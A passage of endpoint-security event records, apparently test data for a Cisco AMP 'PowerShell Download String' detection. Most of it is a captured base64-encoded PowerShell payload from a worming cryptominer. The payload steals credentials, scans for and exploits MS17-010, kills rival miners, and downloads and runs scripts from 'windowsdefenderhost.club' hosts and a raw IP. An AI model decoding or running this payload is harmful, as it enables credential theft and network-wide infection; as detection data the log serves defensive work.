9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAA